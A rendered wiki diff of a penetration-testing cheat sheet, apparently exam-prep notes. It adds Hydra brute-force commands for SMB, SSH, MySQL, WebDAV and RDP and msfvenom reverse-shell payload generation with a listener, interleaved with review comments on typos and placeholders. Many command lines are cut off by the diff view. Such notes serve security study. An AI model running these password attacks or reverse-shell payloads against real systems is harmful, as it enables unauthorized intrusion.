cheat_sheets_various
Differences
This shows you the differences between two versions of the page.
cheat_sheets_various [2024/02/04 02:18] – [grep] gman | cheat_sheets_various [2024/02/04 03:05] (current) – [net commands (Windows)] gman | ||
---|---|---|---|
Line 143: | Line 143: | ||
===== Hydra ===== | ===== Hydra ===== | ||
- | Hydra is a very fast online password cracking tool, which can perform rapid dictionary attacks against more than 50 Protocols, including Telnet, RDP, SSH, FTP, HTTP, HTTPS, SMB, several databases and much more. | + | Hydra is extremely functional for brute-forcing MULTIPLE different protocols. |
+ | * [[https:// | ||
- | **Syntax:** To find the password for an ftp account when you know the username... | + | Specify a single |
< | < | ||
- | hydra -t 4 -l [user] -P [/ | + | hydra -l [user] -p [password] [target IP] [ftp | ssh | etc] |
- | # | + | |
- | # -t 4 | + | |
- | # -l [user] | + | |
- | # -P [/ | + | |
- | # Example: / | + | |
- | # -vV Very verbose: login+pass combo for each attempt | + | |
- | # [machine | + | |
- | # [ftp | ssh | etc] Sets the protocol | + | |
</ | </ | ||
+ | |||
+ | Specify lists of users and/or passwords to try (upper case '' | ||
+ | |||
+ | < | ||
+ | hydra -L [/ | ||
+ | </ | ||
+ | |||
+ | **Options: | ||
+ | * '' | ||
+ | * '' | ||
+ | * '' | ||
+ | * '' | ||
+ | * '' | ||
+ | * '' | ||
+ | * '' | ||
+ | |||
+ | Be very careful with your brute-force speed. You could crash the system or DoS it. | ||
+ | * The '' | ||
+ | * You could set '' | ||
+ | * Hydra actually recommends '' | ||
+ | |||
+ | **SMB:** | ||
+ | |||
+ | < | ||
+ | hydra -l admin -P / | ||
+ | </ | ||
+ | |||
+ | **SSH:** | ||
+ | |||
+ | < | ||
+ | hydra -l student -P rockyou.txt [ip] ssh | ||
+ | </ | ||
+ | |||
+ | **MySQL:** | ||
+ | |||
+ | < | ||
+ | hydra -l root -P / | ||
+ | </ | ||
+ | |||
+ | **WebDAV (http login):** | ||
+ | |||
+ | < | ||
+ | hydra -L / | ||
+ | # http-get : Indicates the protocol to be used | ||
+ | # /webdav/ : Indicates the directory where hydra can find the authentication mechanism | ||
+ | </ | ||
+ | |||
+ | **RDP:** | ||
+ | |||
+ | < | ||
+ | hydra -L users.txt -P passwords.txt [target ip] rdp -s 3333 | ||
+ | # -s : service port (if different than the default) | ||
+ | </ | ||
+ | |||
+ | **Supported services: | ||
+ | * adam6500 asterisk cisco cisco-enable cobaltstrike cvs firebird | ||
+ | * **ftp[s]** | ||
+ | * http[s]-{head|get|post} | ||
+ | * http[s]-{get|post}-form | ||
+ | * http-proxy http-proxy-urlenum | ||
+ | * icq imap[s] irc | ||
+ | * ldap2[s] ldap3[-{cram|digest}md5][s] | ||
+ | * memcached mongodb mssql mysql nntp | ||
+ | * oracle-listener oracle-sid | ||
+ | * pcanywhere pcnfs pop3[s] postgres | ||
+ | * radmin2 **rdp** redis rexec rlogin rpcap rsh rtsp | ||
+ | * s7-300 sip **smb** smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak | ||
+ | * telnet[s] vmauthd vnc xmpp | ||
+ | |||
+ | |||
---- | ---- | ||
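Review bot: The target placeholder is written three different ways in the added Hydra examples: `[target IP]` in the single-credential line, `[ip]` in the SSH line and `[target ip]` in the RDP line. Pick one spelling so readers do not take them for different arguments. The caution "Be very careful with your brute-force speed" sits below the Options list and after the first two examples; moving it above the first command would put it where it is read before anything is run. The rewritten intro also replaces the sentence that named the covered protocols with "MULTIPLE different protocols", which is less precise, although the new Supported services list makes up for it.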
Line 259: | Line 322: | ||
===== msfvenom ===== | ===== msfvenom ===== | ||
- | ==== Reverse Shell Payload ==== | + | To see the available payloads: '' |
+ | * [[https:// | ||
- | To generate | + | First, build a payload with MSFVenom (e.g., |
< | < | ||
- | msfvenom -p cmd/ | + | msfvenom -p windows/ |
+ | msfvenom -p cmd/ | ||
# | # | ||
# -p = payload | # -p = payload | ||
- | # lhost = our local host IP address (this is your machine' | + | # LHOST = local host IP address (this is your machine' |
- | # lport = the port to listen on (this is the port on your machine) | + | # LPORT = local port to listen on (this is the port on your machine) |
+ | # -f = format (of the output) | ||
# R = export the payload in raw format | # R = export the payload in raw format | ||
</ | </ | ||
+ | |||
+ | A **staged** payload will follow this syntax (note the delimiter): | ||
+ | * '' | ||
+ | * '' | ||
+ | | ||
+ | A **non-staged** payload will follow this syntax: | ||
+ | * '' | ||
+ | * '' | ||
After that set up a listener on your attach machine: | After that set up a listener on your attach machine: | ||
- | < | + | < |
Then copy and paste the msfvenom payload into the target box and run it. You should get a reverse shell on your attack machine. | Then copy and paste the msfvenom payload into the target box and run it. You should get a reverse shell on your attack machine. | ||
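Review bot: The unchanged line "After that set up a listener on your attach machine:" still carries the typo "attach" for "attack", and since the lines on both sides of it are being rewritten this is the place to fix it. In the option legend, the new `# -f = format (of the output)` line now sits directly above the retained `# R = export the payload in raw format` with nothing saying how the two relate; state which of the two example commands each one applies to.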
Line 280: | Line 354: | ||
---- | ---- | ||
- | ==== Notes ==== | + | ===== net commands (Windows) ===== |
- | **To-Do:** https:// | + | stuff |
+ | 1 | ||
+ | ---- | ||
- | **Source:** https:// | ||
- | |||
- | **Advice:** I intend to use some features of Metasploit for as many machines as I want on the exam. You really owe it to yourself to read the oscp-exam-guide regarding msfvenom. | ||
- | |||
- | **Additional: | ||
- | * msfvenom cheatsheet: https:// | ||
- | * To see all available payloads: '' | ||
- | |||
- | ---- | ||
===== ping ===== | ===== ping ===== |
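Review bot: The new "net commands (Windows)" section is saved with placeholder body text ("stuff" and "1"); either add the actual commands or mark the section as a to-do so it is not read as content. The same change deletes the whole Notes block, including the **Source:** line, which drops the attribution for the msfvenom material above; keep that source link somewhere in the msfvenom section.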
cheat_sheets_various.1707013127.txt.gz · Last modified: by gman